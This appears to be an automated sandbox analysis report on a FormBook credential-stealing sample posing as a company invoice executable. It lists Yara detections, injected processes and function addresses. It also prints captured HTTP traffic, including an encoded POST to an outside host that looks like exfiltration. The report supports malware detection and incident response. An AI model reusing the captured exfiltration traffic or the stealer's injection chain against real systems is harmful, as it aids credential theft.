0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%;

Source: unknown

HTTP traffic detected: POST /q36s/ HTTP/1.1Host: www.flat-planet.comConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.flat-planet.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.flat-planet.com/q36s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 31 62 47 70 71 4e 3d 66 62 62 71 63 4f 5a 6d 55 4f 42 49 30 30 54 45 76 5a 6e 79 30 32 34 46 56 6c 43 64 58 58 55 4b 5a 31 72 4d 34 31 78 71 68 4d 53 59 7e 6a 57 44 38 45 76 39 64 6f 59 62 4b 30 41 51 37 5f 72 4b 59 35 34 30 46 48 46 4f 54 78 68 79 35 61 78 30 28 41 37 56 6c 38 51 5a 55 69 4f 65 46 6a 45 4b 61 48 57 62 7a 61 36 33 7e 5f 63 73 33 4c 4e 6a 5a 57 50 50 5a 6f 59 38 57 58 36 51 77 61 54 52 4d 38 43 71 4a 78 61 47 64 4c 78 39 33 67 59 49 76 50 7a 30 71 56 30 64 53 6a 66 58 48 4a 34 48 63 76 47 62 53 52 70 71 7a 6d 5a 31 7e 49 4e 5f 76 6a 6b 50 36 54 66 48 71 33 48 70 67 51 64 36 34 6f 6d 33 71 43 6d 56 4e 5f 72 37 66 39 33 42 46 65 4e 59 36 4f 53 48 72 42 7e 59 41 6b 35 5f 34 43 62 2d 62 70 77 72 33 48 4c 68 59 69 4a 59 5a 6d 48 66 65 55 4f 2d 48 58 6f 65 37 44 65 36 34 38 45 6e 43 76 5a 6f 46 47 62 47 72 45 63 68 56 44 64 4a 79 6d 74 4f 62 54 42 6c 32 33 36 55 6f 56 69 32 38 41 57 75 69 4b 54 33 69 6e 46 51 79 51 4f 67 44 32 67 68 48 72 55 34 46 68 44 42 69 61 4b 62 57 70 63 6b 41 44 76 5f 6c 61 46 4b 55 31 52 70 53 5a 61 7a 63 67 67 36 28 5f 56 4c 54 57 4d 69 6f 4f 4f 41 47 5a 62 44 76 4d 4f 4c 4c 6f 78 38 4f 38 58 4a 35 65 59 55 45 4e 6f 52 56 54 58 78 71 49 74 33 62 57 36 35 30 77 67 70 6c 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 1bGpqN=fbbqcOZmUOBI00TEvZny024FVlCdXXUKZ1rM41xqhMSY~jWD8Ev9doYbK0AQ7_rKY540FHFOTxhy5ax0(A7Vl8QZUiOeFjEKaHWbza63~_cs3LNjZWPPZoY8WX6QwaTRM8CqJxaGdLx93gYIvPz0qV0dSjfXHJ4HcvGbSRpqzmZ1~IN_vjkP6TfHq3HpgQd64om3qCmVN_r7f93BFeNY6OSHrB~YAk5_4Cb-bpwr3HLhYiJYZmHfeUO-HXoe7De648EnCvZoFGbGrEchVDdJymtObTBl236UoVi28AWuiKT3inFQyQOgD2ghHrU4FhDBiaKbWpckADv_laFKU1RpSZazcgg6(_VLTWMioOOAGZbDvMOLLox8O8XJ5eYUENoRVTXxqIt3bW650wgplg).

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 5.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.RegSvcs.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.image.exe.3f466b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.image.exe.3d81990.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.384175389.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.385133356.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.821203089.0000000003280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.383935047.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.355695163.000000000F9AB000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.821135364.0000000003250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.820651114.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.303243710.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.303491951.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.338080470.000000000F9AB000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.306533185.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 5.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.RegSvcs.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.RegSvcs.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.image.exe.3f466b0.3.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.image.exe.3f466b0.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.image.exe.2d15fd8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
Source: 2.2.image.exe.3d81990.4.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.image.exe.3d81990.4.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.384175389.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.384175389.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.385133356.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.385133356.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.821203089.0000000003280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.821203089.0000000003280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.383935047.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.383935047.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.355695163.000000000F9AB000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.355695163.000000000F9AB000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.821135364.0000000003250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.821135364.0000000003250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.820651114.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.820651114.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.303243710.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.303243710.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.303491951.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.303491951.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.338080470.000000000F9AB000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.338080470.000000000F9AB000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.306533185.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.306533185.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

.NET source code contains very large strings

Source: image.exe.0.dr, MyForm.cs	Long String: Length: 15019
Source: image.exe.0.dr, MyForm.cs	Long String: Length: 15019
Source: image.exe.0.dr, MyForm.cs	Long String: Length: 15018
Source: 2.0.image.exe.950000.0.unpack, MyForm.cs	Long String: Length: 15019
Source: 2.0.image.exe.950000.0.unpack, MyForm.cs	Long String: Length: 15019
Source: 2.0.image.exe.950000.0.unpack, MyForm.cs	Long String: Length: 15018
Source: 2.2.image.exe.950000.0.unpack, MyForm.cs	Long String: Length: 15019
Source: 2.2.image.exe.950000.0.unpack, MyForm.cs	Long String: Length: 15019
Source: 2.2.image.exe.950000.0.unpack, MyForm.cs	Long String: Length: 15018

Source: C:\Users\user\Desktop\08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe	Code function: 0_2_00007FF6EB146CA4	0_2_00007FF6EB146CA4
Source: C:\Users\user\Desktop\08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe	Code function: 0_2_00007FF6EB142DB4	0_2_00007FF6EB142DB4
Source: C:\Users\user\Desktop\08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe	Code function: 0_2_00007FF6EB145D90	0_2_00007FF6EB145D90
Source: C:\Users\user\Desktop\08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe	Code function: 0_2_00007FF6EB1466C4	0_2_00007FF6EB1466C4
Source: C:\Users\user\Desktop\08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe	Code function: 0_2_00007FF6EB1440C4	0_2_00007FF6EB1440C4
Source: C:\Users\user\Desktop\08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe	Code function: 0_2_00007FF6EB141D28	0_2_00007FF6EB141D28
Source: C:\Users\user\Desktop\08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe	Code function: 0_2_00007FF6EB143530	0_2_00007FF6EB143530
Source: C:\Users\user\Desktop\08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe	Code function: 0_2_00007FF6EB141C0C	0_2_00007FF6EB141C0C
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	Code function: 2_2_02B63880	2_2_02B63880
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	Code function: 2_2_02B6CEE4	2_2_02B6CEE4
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	Code function: 2_2_02B66DE3	2_2_02B66DE3
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	Code function: 2_2_02B6F330	2_2_02B6F330
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	Code function: 2_2_02B6F320	2_2_02B6F320
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	Code function: 2_2_052A6582	2_2_052A6582
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	Code function: 2_2_052A61E8	2_2_052A61E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00401026	5_2_00401026
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00401030	5_2_00401030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0041C834	5_2_0041C834
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0041B8C3	5_2_0041B8C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0041C918	5_2_0041C918
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0041C285	5_2_0041C285
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0041C28D	5_2_0041C28D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00408C80	5_2_00408C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00402D87	5_2_00402D87
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00402D90	5_2_00402D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0041BE04	5_2_0041BE04
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0041C726	5_2_0041C726
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00402FB0	5_2_00402FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0041C7B5	5_2_0041C7B5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A720A0	5_2_00A720A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00B120A8	5_2_00B120A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A5B090	5_2_00A5B090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00B128EC	5_2_00B128EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00B01002	5_2_00B01002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A64120	5_2_00A64120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A4F900	5_2_00A4F900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00B122AE	5_2_00B122AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A7EBB0	5_2_00A7EBB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00B0DBD2	5_2_00B0DBD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00B12B28	5_2_00B12B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A5841F	5_2_00A5841F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00B0D466	5_2_00B0D466
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A72581	5_2_00A72581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A5D5E0	5_2_00A5D5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00B125DD	5_2_00B125DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A40D20	5_2_00A40D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00B12D07	5_2_00B12D07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00B11D55	5_2_00B11D55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00B12EF7	5_2_00B12EF7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A66E30	5_2_00A66E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00B0D616	5_2_00B0D616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00B11FF1	5_2_00B11FF1
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E920A0	11_2_04E920A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04F320A8	11_2_04F320A8
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E7B090	11_2_04E7B090
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04F21002	11_2_04F21002
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E7841F	11_2_04E7841F
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E7D5E0	11_2_04E7D5E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E92581	11_2_04E92581
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04F31D55	11_2_04F31D55
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E60D20	11_2_04E60D20
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E84120	11_2_04E84120
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E6F900	11_2_04E6F900
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E86E30	11_2_04E86E30
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E9EBB0	11_2_04E9EBB0
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_00E5C918	11_2_00E5C918
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_00E48C80	11_2_00E48C80
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_00E42D87	11_2_00E42D87
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_00E42D90	11_2_00E42D90
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_00E42FB0	11_2_00E42FB0

Source: 08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: 5.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.RegSvcs.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.RegSvcs.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.image.exe.3f466b0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.image.exe.3f466b0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
